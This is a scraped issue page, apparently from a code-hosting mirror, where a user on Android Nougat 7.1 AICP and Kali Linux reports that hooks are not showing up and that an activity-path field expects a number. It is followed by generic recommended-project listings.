I'm running Android Nougat 7.1 AICP for the phone and the last Kali-Linux

Thanks in advance

Hooks not showing up.

hook

I tried entering the path to the activity, but it's expecting a number... Any ideas?

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.